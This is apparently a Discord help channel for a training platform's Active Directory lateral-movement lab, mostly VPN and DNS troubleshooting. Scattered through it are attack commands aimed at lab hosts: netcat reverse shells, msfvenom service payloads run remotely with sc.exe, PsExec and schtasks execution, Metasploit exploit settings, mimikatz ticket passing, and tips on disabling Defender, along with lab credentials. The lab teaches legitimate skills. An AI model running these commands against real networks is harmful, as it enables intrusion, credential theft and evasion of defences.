#lateral-movement-and-pivoting
@shadow linden thank you for this delight of a room. A lot learned, and astonished at what you can achieve with port forwarding. Could run through all the tasks without a single issue.
Gave +1 Rep to @shadow linden
I am having trouble with the last task, as my SSH connection is not being established due to (maybe?) DNS problems, or it dies shortly after
Using this
ssh za\\natasha.howells@thmjmp2.za.tryhackme.com -L 8888:thmdc.za.tryhackme.com:80 -R 0.0.0.0:6666:127.0.0.1:6666 -R 0.0.0.0:7878:127.0.0.1:7878
to push a couple of ports to thmjmp2 and forward the DC:80 port to me
Seems like a weird network bug to me
After 10 tries or so it worked (although cannot open ports on the remote box with -R due to the ssh config haha) ... so yeah definitely a network bug
I figured it out, problem is, I was using VPN and Attackbox simultaneously and they both got the same IP address! this fckd up my connectivity I guess
Hi, can anyone access this network? it tells me "Network state: Resetting"
I'm getting a 404 when downloading the VPN file, even after regenerating the VPN file
Hey, could you try leaving the room and rejoining after 5 mins? It will probably work after that
worked thanks
Hey, can 2 guys reset this network? I worked on it before but a simple reverse shell was not working, and now the domain is not reachable. I have set again "systemd-resolve --interface lateralmovement --set-dns 10.200.75.101 --set-domain za.tryhackme.com" but it is still not working and the network state is Running
thx guys
Is anyone having issues with the ovpn file for this room?
Have you set the nameserver?
Is the network resetting?
Have you tried to vote to reset it?
Yep, I cannot get the actual VPN to connect but the other rooms work fine and the general THM VPN connects fine. It's just the lateral movement and pivoting VPN that fails to connect
Do you get a cipher error?
I do not
Can you post a screenshot of your output?
Yeah, I tried regenerating the ovpn file from the access page and then rerunning it only to get this
That could happen if you have two connections at the same time, or if you started the attackbox and try to connect from your PC as well, as they share the same ovpn file.
I'll double check and make sure nothing weird is going on with that
Okay, this was 100% a problem of PEBKAC
Glad it worked in the end!
I had a terminal tab open where it successfully connected and I just did not realize it
Btw thanks a ton @shadow linden I have my OSCP scheduled for Saturday so I'm doing some last minute refreshing and notes cleanup so the stress has me missing some super simple things.
Gave +1 Rep to @shadow linden
Good luck with your exam! Give it your best ๐ช
Thanks a ton! I plan to give it hell and attempt to stay zen the whole time rather than cracking under pressure.
Gave +1 Rep to @shadow linden
There's plenty of time! Pressure is your worst enemy indeed ๐
Hi everyone, I got stuck on task 7 of the 'Lateral Movement and Pivoting' room. I got the first flag but can't get the second one. From the RDP connection I performed local and remote port forwarding with the following command:
ssh myUser@myIP -R 8888:thmdc.za.tryhackme.com:80 -L *:6666:127.0.0.1:6666 -L *:7878:127.0.0.1:7878 -N
then I set up metasploit with the following parameters: use rejetto_hfs_exec, set payload windows/shell_reverse_tcp, set lhost thmjmp2.za.tryhackme.com, set ReverseListenerBindAddress 127.0.0.1, set lport 7878, set srvhost 127.0.0.1, set srvport 6666, set rhosts 127.0.0.1, set rport 8888, but the result is:
[*] Started reverse TCP handler on 127.0.0.1:7888
[*] Using URL: http://thmjmp2.za.tryhackme.com:6677/QZKwB2WlEUy
[*] Server started.
[*] Sending a malicious request to /
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\eakCPsIpwCURmy.vbs' on the target
[*] Exploit completed, but no session was created.
I tried to see my port 8888 from the browser and I see the HFS server so port forwarding should work correctly
Is it possible to reset the network 10.200.64.0/24? There have been 4/5 votes to reset for a long time
Be sure to check the port numbers match between your ssh tunnel and metasploit. In your commands, you are forwarding port 7888 via SSH but the port used by metasploit is different 7878. Same for the 6677/6666
I did several tests and copied the command wrong. I used the same ports between metasploit and the ssh tunnel. I corrected the message, thank you
Gave +1 Rep to @shadow linden
Having an issue setting up the lateral movement room DNS to resolve the creds website. It seems I cannot nslookup the domain controller. Any possible solution for that?
Can you send a capture of your resolv.conf and the output of nslookup? I might be able to help with that info
i will log in again
@shadow linden
is that the attackbox?
yeap
did you run systemd-resolve --interface lateralmovement --set-dns $THMDCIP --set-domain za.tryhackme.com with $THMDCIP replaced with the actual IP of your DC?
can you try doing nslookup THMDC.za.tryhackme.com and send the output
That's weird... What about ip add show lateralmovement?
In this case, it is likely the network needs a reset
the DC is probably not working as expected
You can just click the reset button in the room
5 votes are needed for a reset
you might need to wait for others to vote, or you can vote again every hour to speed up the process
sounds good
Hi, in regards to the techniques in the room, which among them are the most consistent?
Also, I had some issues with the PTT attack (maybe it's because there were a lot of people doing it)
I found PTH and PTK attacks more consistent than PTT, maybe it's because it allowed me to run commands directly
In terms of pure consistency, they should all be 100% consistent as they just mimic regular authentication. However some attacks will work in specific network setups and not in others, as administrators may disable some authentication mechanisms that the attack vectors rely on.
Then you also have to take detectability into account. This will also largely depend on the network you are assessing and the blue team behind it. Most of the techniques will theoretically work just as a regular authentication attempt and won't be easily distinguishable from regular users connecting to services. However, if you use UserA's credentials to log in to a server from UserB's computer, then your behaviour starts to become suspicious.
There are also some other technicalities to keep in mind, for example doing a PtK with an RC4 key. If you are assessing a network that isn't decades old, using such a weak protocol might easily be detected as suspicious behaviour, since all machines nowadays will normally use AES instead.
All in all, I guess the best attack is the one that mimics normal user behaviour, given the specific scenario you are checking.
Thanks, I've been trying to make the PTT attack work, am I correct to assume that after I have injected the ticket into my session, this is the same as doing the other commands in PTH and PTK with /run:[reverse shell] which means that any commands I run now will be using the credentials from that?
Gave +1 Rep to @shadow linden
This is the current error I get. I'm unable to inject a proper ticket from t1_toby.beck as it doesn't have any tickets, I guess, when I dumped the tickets. That's why I tried using some leftover tickets
This is the mimikatz output when doing the dump
Have the same issue with DNS described in #lateral-movement-and-pivoting message
Have tried to reset the network, used the mentioned "systemd-resolve --interface ...". Still cannot make it work for several days so far :(
I've run out of ideas, could you please help? (using the Attackbox. Interesting that all was fine a week ago)
and today the distributor IP is resolved by the DC but there is no access, neither by http nor with ping/telnet.
Update: it just started working after the network was reset several times. Looks like something was broken on the network level for this lab environment.
Hi, Is anyone able to ping/connect to the network?
It was working fine a minute ago, but now I am unable to connect.
hey, in the port forwarding part, instead of using the given command in the instruction, I tried to use "socat.exe TCP4-LISTEN:8080,fork TCP4:thmdc.za.tryhackme.com:80 |
socat.exe TCP4-LISTEN:6569,fork TCP4:10.50.65.226:6569 |
socat.exe TCP4-LISTEN:7869,fork TCP4:10.50.65.226:7869" which I assume has the same effect as the given command in the instruction (using ssh). But my metasploit said no session was created, did I make a mistake somewhere?
It should have the same effect indeed. Just check if the port numbers match with your metasploit config
Thank you for your reply, I have already checked and confirmed that the port numbers are correct. When I used the ssh tunnel, I did get a reverse connection; I wonder what the problem was
Hello,
I am just curious because I was able to get a reverse shell via sc.exe and I am nt authority\system on the THMIIS host. But I am unable to get the flag from flag.exe. I cleaned up all of my binaries and deleted the services. Anything else I might be missing?
The only thing I did different was I did not use MSFVenom or MSFConsole
Hey, the flag checker actually expects you to do it via msfvenom. This is mostly due to some limitations on how it works, so sorry for the inconvenience
Ahh okay, that's cool. Thanks!
Gave +1 Rep to @shadow linden
Another great network, learned a couple of new things. Thank you @rose kernel and @shadow linden
Gave +1 Rep to @rose kernel
Task 7, with metasploit I can't get a reverse shell:
[-] Command shell session 3 is not valid and will be closed
I'm sure I've set it up right. Maybe the network needs a reset?
On task 5, does that statement mean that after passing the ticket from the mimikatz prompt, we can exit to the normal prompt and our current session/token has already changed into Administrator? Is my understanding correct?
Forget, my bad
Your ticket should be loaded into your session. You may still need to do a runas /netonly ... to switch the username being used by the system for outgoing connections
you can check the loaded tickets with klist
hmmm but then it means we still need the password? I thought we had already loaded our ticket in.
For task 5 on thmjmp2 it starts with mimikatz but you don't have admin privs
Is that a hidden challenge or am I missing something?
Hey, there is a section in the task called "Let's get to work" where admin credentials are provided
you can input any password and it should work, since the kerberos ticket will be used
ah yes... I did it. And that is the point of injecting the ticket. Thanks @shadow linden
Gave +1 Rep to @shadow linden
@barren frost Please do not try to ping everyone, I'm sure not everyone wants to get a ping from you
Thanks mate, won't do it again
Need a bit of help;
It's asking me to run this command on the victim's machine:
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443"
but the victim machine does not have nc64.exe, am I meant to upload nc64 to the victim's machine?
Hello guys
Have a problem
Can't connect to RDP on THMJMP2
It types "The username or password are incorrect"
Tried with 3 different credentials
It should be there. Maybe someone deleted it, in which case you are free to upload your own version, or reset the network
Could you send a screenshot of the command and error you are getting?
Someone probably deleted it. I tried to upload it but it gave me an error about not being able to connect to the python3 server
That doesn't sound like nc
doesn't matter, I tried using nc but I'm not receiving a shell back, repeated the steps 3 times and I'm getting nothing :/
Sorry, can't reproduce the problem
After a restart the network error disappeared
Hello need some clarification regarding some commands. In task 3 I tried all of the techniques explained but got stuck in two which would not work:
- Psexec returns an access is denied message with the commands
PsExec64.exe \\thmiis.za.tryhackme.com -u t1_leonard.summers -p EZpass4ever -i cmd.exe -accepteula
PsExec64.exe \\thmiis.za.tryhackme.com -u ZA.TRYHACKME.COM\t1_leonard.summers -p EZpass4ever -i "C:\tools\nc64.exe -e cmd.exe my_ip 1234"
- After uploading the myservice.exe payload and getting the flag file, I tried to perform the same attack with schtasks but for some reason I am not able to get a reverse shell. I used runas because at first I was getting an access is denied message. I had a listener waiting with /multi/handler.
runas /netonly /user:za.tryhackme.com\t1_leonard.summers "schtasks /s 10.200.98.201 /RU \"SYSTEM\" /create /tn nabecosTHM2 /tr \"%windir%\nabecos.exe\" /sc ONCE /sd 01/01/1970 /st 00:00"
runas /netonly /user:za.tryhackme.com\t1_leonard.summers "schtasks /s 10.200.98.201 /run /TN nabecosTHM2"
Hey, for psexec, my guess is that the console from where you are launching it has a session with another unprivileged user. For some weird reason psexec only uses the user/pass you supply to upload the executable to the ADMIN$ share, but still uses your current session to try and start the associated service. Be sure to spawn a runas /netonly console and run psexec from there
Yah by reading some of the answers above I kind of understood that so I performed two additional attempts:
PsExec64.exe \\thmiis.za.tryhackme.com -u ZA.TRYHACKME.COM\t1_leonard.summers -p EZpass4ever -accepteula -i "c:\tools\nc64.exe -e cmd.exe 10.50.95.55 4445"
What I think this should do is first I get a shell with elevated privileges and then I try to get another shell to IIS using the nc64.exe binary inside the tools folder. Unfortunately it says the path to the file does not exist or something? I even checked if the file had a different name but it existed. My syntax is probably wrong
- I also tried with cmd.exe in the second command but it exited with code 0 or something, which I already saw in an earlier response why it happens, so I'm ok with that
For your second problem, my guess is that it has something to do with the double-quote escaping. CMD is quite weird with that. Did you try to run the command and check if the task is created as you'd expect? or maybe replacing %windir% with C:\windows\ just for a sanity check?
Did that and I checked that the service was created, so the problem must be in the command that executes the payload, but I am gonna double check again!
Hi, I have not checked if the explanation of why it was not working was given.
I had the same problem, the only thing I did differently was using a different port than 4444, when I used 4444 it worked (I was using 1337)
I reply to you just so you know what might be happening
└─$ cat /etc/resolvconf/resolv.conf.d/tail
nameserver 10.200.78.101
nameserver 8.8.8.8
search za.tryhackme.com
Can anyone vote to reset this room?
I think someone was messing around with it and deleted the flag in the t1_toby.beck Desktop directory
Which subnet are you on?
There are multiple.
maybe I'm trolled or making a huge mistake, but no mimikatz, just trying to learn lol
also confirming: no mimikatz in C:\tools on thmjmp2
I requested a reset but it was 4/5
Hello all! Simple question here. In task 3, it tells us to SSH into THMJMP2 with the initial access given in task 1. Then it gives us the credentials for a tier 1 admin. After, it says that we'll learn how to use those credentials to move laterally to THMIIS using sc.exe. I'm kind of confused; are we supposed to SSH using the new credentials or use sc.exe to create a remote session? The confusion is also because right after that, the room says that we'll be setting up a payload of some sort.
you are supposed to ssh with the credentials in task1, and spawn a remote process in the admin share, and then use sc.exe to point binpath to your script to gain access to THMIIS
mimikatz is back on thmjmp2
In Task7: Port Forwarding:-
C:> ssh tunneluser@ATTACKER_IP -R 8888:thmdc.za.tryhackme.com:80 -L *:6666:127.0.0.1:6666 -L *:7878:127.0.0.1:7878 -N
instead of the IP address, if we give 127.0.0.1, how will it identify source and destination?
Having trouble with downloading the lateral movement network VPN config file. Trying to import it for the lateral movement and pivoting section, it's like on a loop saying connected then keeps refreshing and disconnecting
leave the network room... wait 5-15 mins... rejoin.... go to download vpn config file... try again and see if it works
oh yeah good idea thanks
that would generally make it switch your subnet around which sometimes helps
with task 3, is the machine IP something to do with the DNS IP or domain controller or my host machine IP lol
Can you be a little more clear?
Hello all! Trying to connect to the OVPN on my personal Kali box, but I keep getting these messages. It happens often, I usually just stop working on the room for a day or two and when I come back to it, it's fixed
This one is specific to the room, which is why I'm posting it here. If it doesn't belong here, please let me know!
EDIT: Fixed it by regenerating a new ovpn file, but I'd still like to know why this happens
ssh tunneluser@10.50.69.171 -R 8888:thmdc.za.tryhackme.com:80 -L *:6666:127.0.0.1:6666 -L *:7878:127.0.0.1:7878 -N
task 7: am I meant to know the password for this?
I've set up a listener using metasploit but this command won't run without a password, not too sure
Is the distributor.za.tryhackme.com and/or DNS down in the network? I cannot resolve anything. I did not have any issues with the other networks. so I doubt it is my setup... I voted to reset. 2/4 Anyone else experiencing problems ?
Is this (you should receive a connection in your AttackBox from where you can access the first flag on t1_leonard.summers desktop.) supposed to be received by the reverse TCP handler on port 4444?
Hello everyone, I can't connect to the VPN. Why?
2023-05-11 16:45:23 --cipher is not set. Previous OpenVPN version defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2023-05-11 16:45:23 OpenVPN 2.5.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Jul 5 2022
2023-05-11 16:45:23 library versions: OpenSSL 3.0.5 5 Jul 2022, LZO 2.10
2023-05-11 16:45:23 Outgoing Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2023-05-11 16:45:23 Incoming Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2023-05-11 16:45:23 TCP/UDP: Preserving recently used remote address: [AF_INET]54.194.161.223:1194
2023-05-11 16:45:23 Socket Buffers: R=[131072->131072] S=[16384->16384]
2023-05-11 16:45:23 Attempting to establish TCP connection with [AF_INET]54.194.161.223:1194 [nonblock]
Hello there, I'm on the room "Lateral Movement and Pivoting" Task 3 "Spawning Processes Remotely". I have done everything, I'm connected as "t1_leonard.summers" but when i run the "Flag.exe" in the desktop it says "Sorry! You are still missing something. No flag for you yet. (7)".
Can I get some help pls?
In Task 3, the command
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443"
According to the task this is supposed to start a reverse shell on the attacker machine from thmjmp2 as t1_leonard.summers. But the reverse shell received is as the user I requested from the "distributor" site. Is that supposed to happen?
No problems completing the task tho.
Have you checked if you're NT AUTHORITY\SYSTEM?
I got the same error ending in "(7)". Solved tho.
Did you use the exact port in the task or something different?
The number at the end could be debug codes, and in this case 7 is wrong port, I think.
Yep very likely numbers at the end are debug codes.
From what I can test:
1 might be Insufficient Privileges (running Flag.exe as t1_corine.waters for Task 4)
7 might be wrong port
5 might be sufficient privileges but wrong method.
Hey mate thanks for your reply
Gave +1 Rep to @tranquil lynx
Usually I always use a personalised port but when I saw it wasn't working I tried again with the ports given by the task and it didn't work
I will try again soon and stick to the port asked
People are dumping .kirbi tickets directly in C:\tools.
At least move it to C:\Temp or somewhere else.....
hey guys
I need help plz
I've done several lateral movement labs but now dns has stopped working and I can't access http://distributor.za.tryhackme.com/creds
I've done the configuration several times and I can't access the dns anymore
I followed these steps as I did the other times
Network Manager -> Advanced Network Configuration -> Your Connection -> IPv4 Settings
Set your DNS IP here to the IP for THMDC in the network diagram above
Add another DNS such as 1.1.1.1 or similar to ensure you still have internet access
Run sudo systemctl restart NetworkManager and test your DNS similar to the steps above.
but still not working... I can only access by ip
have you tried just adding the THMDC IP manually to /etc/resolv.conf?
ah reply bit late.... well done discord client....
looks like mimikatz is missing, is this intentional?
Hey, it should be there for you. Someone might have deleted it. In this case, feel free to upload your own copy or just restart the network and it should be back.
Kinda burned out my enthusiasm for today on this lab. Did upload my own copy but the user I was after looked to be missing, so the network would need to be reset?
but thanks for fixing
will poke at it again tomorrow. Task 5 BTW
I'm having trouble with task 3 of this room, here's my commands and output in the end:
attackbox: msfvenom -p windows/shell/reverse_tcp -f exe-service LHOST=10.50.17.193 LPORT=9001 -o pwnserv.exe
attackbox:
smbclient -c 'put pwnserv.exe' -U t1_leonard.summers -W ZA '//thmiis.za.tryhackme.com/admin$/'
EZpass4ever
msfconsole -q -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LHOST lateralmovement; set LPORT 9001; exploit"
attackbox: ssh t1_leonard.summers@za.tryhackme.com@thmjmp2.za.tryhackme.com
attackbox: nc -lvp 4443
in ssh: runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.50.17.193 4443"
EZpass4ever
in nc -lvp revshell:
sc.exe \\thmiis.za.tryhackme.com create pwnserv binpath= "%windir%\pwnserv.exe" start= auto
sc.exe \\thmiis.za.tryhackme.com start pwnserv
msf6 exploit(multi/handler) > set LHOST lateralmovement
LHOST => 10.50.17.193
msf6 exploit(multi/handler) > ste LPORT 9001
[-] Unknown command: ste
msf6 exploit(multi/handler) > set LPORT 9001
LPORT => 9001
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.50.17.193:9001
[-] Command shell session 1 is not valid and will be closed
[*] 10.200.19.201 - Command shell session 1 closed.
TL;DR: I followed the steps as described in the walkthrough but still cannot get an actual reverse shell going
I've tried following a writeup, that also didn't work
Solution || if using metasploit to catch the shell, set the payload of your listener equal to the msfvenom executable payload you generate||
having quite a time getting a lsass dump from win11 22h2 to parse with pypykatz/mimikatz, trying to show cached credentials for a training thing, I have updated everything and they both are not able to do it, anyone know possibly why? The dump looks okay in windbg. took various ways, taskmgr, comsvcs.dll, procdump64, with appropriate perms, RunAsPPL=0. Trying to think what else might be the cause, unless the structure is changed again recently? does this attack still work?
Edit: I am stupid in the head. I think the flag.exe is missing from the desktop?
nvm
Let me know when THM adds a module that teaches me how to read, I am actually dumb
Hi all, need some suggestions as I am not able to start the room. I have configured my machine to have the lateralmovement interface with the DNS specified in the network but I am still not able to access the http://distributor.za.tryhackme.com/creds file. Can someone advise if I might be missing something?
I don't know what's wrong; at times it works, at times it doesn't. Is the network unstable?
Anyone from the THM staff here? I've wasted the whole day trying to fix the DNS issues and unfortunately it's still fluctuating.
I am facing an issue while configuring the dns
I am not able to connect with AD
it gave me an error message: "could not be reached"
This happened a few times with me too. Did the exact things a day later and it worked... I simply switch to the Attackbox in those situations
Btw, does anybody know why in task 5 I can only login to "THMIIS" with the NTLM hash from Toby? Wasted an hour because I tried logging into the IP of THMJMP2 instead. No clue why this doesn't work...
Do you have 'dig'? Can you dig distributor.za.tryhackme.com?
dig @10.200.48.101 distributor.za.tryhackme.com?
Do you have a route to 10.200.48.x in ip r?
Is an internet DNS server taking precedence in /etc/resolv.conf?
Struggling with the DNS settings for this lab. I am using my own Kali VM and I've followed the DNS adjustment instructions in the room. I've added both the IP of the DC and 1.1.1.1 as additional DNS servers in my network configuration, however I still cannot confirm access to the http://distributor.za.tryhackme.com/creds endpoint, any thoughts?
Here are the contents of my /etc/resolv.conf
Try adding 10.200.93.101 distributor.za.tryhackme.com to hosts?
down?
Why do you have search... etc in there?
welp either shadows copy and pasting passwords is not working
or someone changed the password for the leonard user
C:\Windows\system32>sc.exe \\thmiis.za.tryhackme.com create shadowservice-3249 binPath= "c:\Windows\shadowservice.exe" start= auto
sc.exe \\thmiis.za.tryhackme.com create shadowservice-3249 binPath= "c:\Windows\shadowservice.exe" start= auto
[SC] OpenSCManager FAILED 5:
Access is denied.
C:\Windows\system32>

oh wait a min
never mind.... still same problem
guess either shadow gotta try another subnet
or wait for resets to go through
Hello,
I'm having issues configuring DNS and connecting to the domain.
Even after setting DNS with the systemd-resolve command, nothing works.
Please advise
Same
It always returns
ssh: connect to host thmjmp2.za.tryhackme.com port 22: No route to host
Seems like it needs a reset
on the attackbox or on your own kali vm???
Can someone vote reset?
which subnet
I'm on attackbox
My VM
10.50.17.90/24
okay then guess systemd-resolve stuff should have worked... so vote for reset then...
I did , we need one more vote
Yeah, I've been stuck for 3 hours, feels bad
for your own VMs you either edit /etc/resolv.conf or use NetworkManager to change the DNS
well you can vote once every hour
Ok let me try it
ohh that's a new thing for me
well now you know
also stating your subnet when asking for resets in here helps, as not everyone is on the same subnet
Oh wait I did
I see
thx
no problem and hope you can get it working
I'm on 10.50.61.x
Oh sorry... that's 10.200.64.x
no problem... common mistake
Looks like I need to wait for 1 more hour if no one votes
And hopefully no one extends
Yea
yay first actual flag for this network gotten
I still cannot connect even after reset
Can anyone help please... I'm stuck
then we can go through some pictures of where things might have gone wrong
Now i'm not sure if it was someone here, but whilst I was hosting a listener on the current 10.200.71.x network someone attempted to connect to it from 10.50.65.120
listening on [any] 4443 ...
connect to [10.50.<snip>] from (UNKNOWN) [10.50.65.120] 46800
Not sure if this is something automated or possibly another user targeting my VM, but it had me a lil spooked
@azure bronze
I'll take a look in a bit^
likelihood that they typoed the IP??? not super high but also not super low... but jabba will deal with it
There seems to be a problem still with lateralmovement. It has been reset but still shows 4/5 requests for a reset. The VPN connection looks fine but neither pinging the servers nor traceroute work. It is not possible to curl the distributor server either.
I've found the connection to this room can be quite pedantic at first (with no real idea of why), resetting helped me connect to the AD server after everything else was correctly configured on my kali vm.
It was quite a major ballache to get the Kali attackboxes to work with the network rooms, given no access to control the IPv4 settings, systemd-resolve being deprecated (resulting in needing to install resolvectl and some substantial update packages) or manually editing /etc/resolv.conf whilst also including backup DNS servers so you don't lose internet access
are you guys able to ping the THMDC machine ? it worked well like 2 days ago, and now its gone
Has the network been reset?
It's been resetting a lot since yesterday, still doesn't ping on thmdc.za.tryhackme.com
You on the .106.x network? my access cycled and now it's gone back to not detecting the DC
Finally got a restart to trigger, let's see if that did the trick..
Reading through here, some mentions of this turning into a zombie network due to the 'extend' function breaking in the past but not sure if that'd been resolved since 2022
And resetting did the trick, annoyingly
This is thmjmp2 right?
Worst case, you may have to wait for the network to expire and reset, though you can manually upload the tools if you know where to get the correct binaries
Anyone else having issues connecting to the network?
nslookup thmdc.za.tryhackme.com
;; connection timed out; no servers could be reached
can you cat /etc/resolv.conf
Hi @feral granite , of course:
root@ip-10-10-16-164:~# cat /etc/resolv.conf
# This file is managed by man:systemd-resolved(8). Do not edit.
#
# This is a dynamic resolv.conf file for connecting local clients to the
# internal DNS stub resolver of systemd-resolved. This file lists all
# configured search domains.
#
# Run "systemd-resolve --status" to see details about the uplink DNS servers
# currently in use.
#
# Third party programs must not access this file directly, but only through the
# symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a different way,
# replace this symlink by a static file or a different symlink.
#
# See man:systemd-resolved.service(8) for details about the supported modes of
# operation for /etc/resolv.conf.
nameserver 127.0.0.53
options edns0
search za.tryhackme.com eu-west-1.compute.internal
Ok, you want to nano that file, and stick the THMDC IP from your network layout in the room above the nameserver line
as an extra nameserver I assume?
Yes.
so the file now looks like:
# operation for /etc/resolv.conf.
nameserver 10.200.64.101
nameserver 127.0.0.53
options edns0
However sadly still:
root@ip-10-10-16-164:~# nslookup thmdc.za.tryhackme.com
;; connection timed out; no servers could be reached
Is the network running?
should be
hm cant post a screenshot it seems but yes it is
Network state: Running
Network up time: 34m
I'll call it a day for today and see if this resolves itself by the network resetting at some point. Thanks for trying to help @feral granite
Gave +1 Rep to @feral granite
Hello,
I cannot complete task 3 as running sc.exe is giving me an access denied error... Anyone know what could be the reason?
In my instance, I think the leonard user password has been changed. It may be the same for you. I have been waiting a couple days for it to eventually reset.
"If your nc with runas gives you back the wrong user, that means the authentication failed." This is an incorrect statement, FYI.
yeah hit reset button or wait for the network to stop by itself and then start it again
Yea getting access denied error
Will see
Do you know if, when the network stops, the passwords revert to default? I have a feeling that isn't the case, but I am hoping I am wrong.
I thought so too... but who changes the password btw...
it does as it is very close to a normal reset and reloads all the images when you start it up again
technically you can play subnet roulette too but less needed now
Thank you! I hadn't really thought about leaving and rejoining the room. Also a good idea.
Gave +1 Rep to @full drum
lol you understood shadows message about subnet roulette
Is the network for this room just totally busted?
It doesn't appear that it can even be reset; when I try to, it says that it's resetting, but then when I refresh it goes back to saying 4/5 votes and I can't access any of the IP addresses.
Made a support ticket but ¯\_(ツ)_/¯
Did you try leaving the room for 5 mins, then re-joining?
I left and joined back into different network still getting access denied for sc.exe
Is "leaving the room" different than just navigating away/not using it? I tried both yesterday and the day before many hours apart and was still getting the same problem
No. You have to press the cog on the top right
Will give it a try today
there is a chance that both the subnets you were in had the same problem, sadly enough
@rose kernel I finally got the chance to work my way through "Compromising Active Directory". I'm currently preparing for OSCP, and these rooms are a significant contribution to my understanding. I just want to thank you and the other creators for these rooms
Gave +1 Rep to @rose kernel
Thanks for the feedback! Glad you are learning from it!
Gave +1 Rep to @strange iron
Waiting on my network to reset. How long does it normally take?
This AD network has been the most frustrating so far.
Anyone have advice on working on this one? I can't get the network to reset; it's been stuck at 4/5 for the past 24 hours.
I can't reach the IP of the dc for this one. I've checked my routing table and it shows a route to the network the dc is in but I still can't reach anything in the network. Is there something I'm missing?
Hey, have you tried leaving and rejoining the room? That should change you to another network and you should be able to continue
This won't affect your progress in the room btw
Good idea. I will try it out.
That did it! Thank you. Ready to complete this one.
Gave +1 Rep to @shadow linden
Hello
Using the new credentials from the new link ( http://distributor.za.tryhackme.com/creds_t2), I cannot use psexesvc (access denied)
Does anyone have clues why ?
(Task 6 Abusing User Behaviour)
Answer: Don't forget to run the terminal as administrator
yuup common mistake right there
Somebody problems with the network connection?
did someone delete mimikatz from network 91?
it disappeared but instead i have a bunch of .kirbi files
lol the program just disappeared right in front of my eyes, is windows defender running on these machines?
windows defender is killing it
you can disable realtime monitoring
it's not my machine though
will need to disable defender next iteration of the network
it will kick back in automatically, no biggie
then I need to be fast
it let me use mimikatz for quite some time before getting rid of it
kind of strange, but someone else could have disabled it before you for a while
the other thing you can do is set an exclusion folder
someone restart the machine!
You might need to state your subnet.
There are multiple instances.
I can't connect to openvpn in this room
sudo openvpn lateralmovementandpivoting.ovpn
2023-08-25 23:34:28 Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2023-08-25 23:34:28 Note: cipher 'AES-256-CBC' in --data-ciphers is not supported by ovpn-dco, disabling data channel offload.
2023-08-25 23:34:28 OpenVPN 2.6.3 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2023-08-25 23:34:28 library versions: OpenSSL 3.0.9 30 May 2023, LZO 2.10
2023-08-25 23:34:28 DCO version: N/A
2023-08-25 23:34:28 TCP/UDP: Preserving recently used remote address: [AF_INET]52.214.166.96:1194
2023-08-25 23:34:28 Socket Buffers: R=[131072->131072] S=[16384->16384]
2023-08-25 23:34:28 Attempting to establish TCP connection with [AF_INET]52.214.166.96:1194
2023-08-25 23:34:49 TCP: connect to [AF_INET]52.214.166.96:1194 failed: Connection refused
2023-08-25 23:34:49 SIGUSR1[connection failed(soft),connection-failed] received, process restarting
2023-08-25 23:34:49 Restart pause, 1 second(s)
but no use
This happened to me the other day. Terminated the machine and redownloaded my vpn file and waited 10 mins and it could ping the DC again.
Is there anyone with this same issue?
Can't connect to the Lateralmovementandpivoting VPN:
Pinging 10.50.61.172 with 32 bytes of data:
Request timed out.
Even the attackbox doesn't ping the THMDC:
PING 10.200.64.101 (10.200.64.101) 56(84) bytes of data.
From 10.50.61.1 icmp_seq=1 Destination Host Unreachable
Hi there, I'm encountering the same thing since yesterday.
I tried from my computer with OpenVPN, also with the AttackBox, restarted the network... and it's still not working.
Yepp, the network was reachable yesterday. Also the restart button seems like it does something, but nothing happens.
Alright, FYI, I tried this noon and it worked this time.
thx for the info
Gave +1 Rep to @supple warren
hi, good morning everyone
please can responder capture hashes through proxychains?
Hi, I'm trying to solve this room and couldnt find the DC via nslookup
I've left the room and joined again couple times and got the same result
Hi, just to be sure, did you configure the DNS following the indication in the 1st task?
I configured the DNS as indicated in the guide and it doesn't appear to be working for me either. The lateralmovement interface is up and I'm getting an IP but I can't reach any of the target hosts (DC, jumpbox, etc...)
hello, I'm on a CTF right now that has a WordPress site hosted on the target. I got admin to the WordPress site, does anyone know if there are ways to get from the WP site to the underlying server?
If this is an active ctf we can't help you, if it is for a TryHackMe room then you can go to #room-help for help
aight
yes ofc
I can get the creds, but the nslookup command doesn't work
Ok, it was just to be sure
If you can get the credentials, then it seems that you can reach the domain.
I don't know why nslookup doesn't work, but did you give a try to complete the next tasks of this room ? Maybe you're well configured after all ?
@potent meteor you're right, thanks
Gave +1 Rep to @supple warren
My pleasure, glad I could help you
hi guys
Hi guys!
Who knows what's happening with the lab?
Hey, I'm having some trouble completing Lateral Movement task 7, Tunneling Complex Exploits. After setting all the Metasploit options I got this result:
[*] Started reverse TCP handler on 127.0.0.1:8989
[*] Using URL: http://thmjmp2.za.tryhackme.com:7777/wTPndpwdZls3vfc
[*] Server started.
[*] Sending a malicious request to /
[*] Server stopped.
[*] Exploit completed, but no session was created.
I already have an SSH connection with tunneluser.
On that connection I got the following message after running Metasploit:
"connect_to thmdc.za.tryhackme.com port 80: failed."
Any idea?
The server needs to be restarted......plx.
Hi there!
Which subnet are you in?
Some users would get annoyed if there were x amount of resets and 0 of them were for your actual subnet.
Yesterday I was doing Lateral Movement task 7 Tunneling Complex Exploits. I couldn't access the server. I tried several ways and nothing. Sorry if it was disturbing.
Yeah, but if you want people to reset the server, you're going to have to state the subnet you're in.
Third octet in the THMDC will let you know.
ok, thx. Maybe you can tell me what the error was about...
